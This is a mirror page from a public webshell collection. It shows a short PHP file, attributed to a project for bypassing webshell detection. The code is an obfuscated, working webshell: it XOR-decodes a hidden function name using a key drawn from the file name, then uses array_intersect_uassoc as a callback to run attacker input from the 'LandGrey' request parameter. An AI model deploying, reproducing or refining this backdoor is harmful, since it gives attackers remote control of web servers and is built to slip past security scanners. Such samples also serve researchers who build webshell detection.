mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
32be5d26bf
From:https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/php Author:Build by LandGrey
7 lines
217 B
PHP
7 lines
217 B
PHP
<?php
|
|
$password = "LandGrey";
|
|
$key = substr(__FILE__,-5,-4);
|
|
${"LandGrey"} = $key."Land!";
|
|
$f = pack("H*", "13"."3f120b1655") ^ $LandGrey;
|
|
array_intersect_uassoc (array($_REQUEST[$password] => ""), array(1), $f);
|
|
?>
|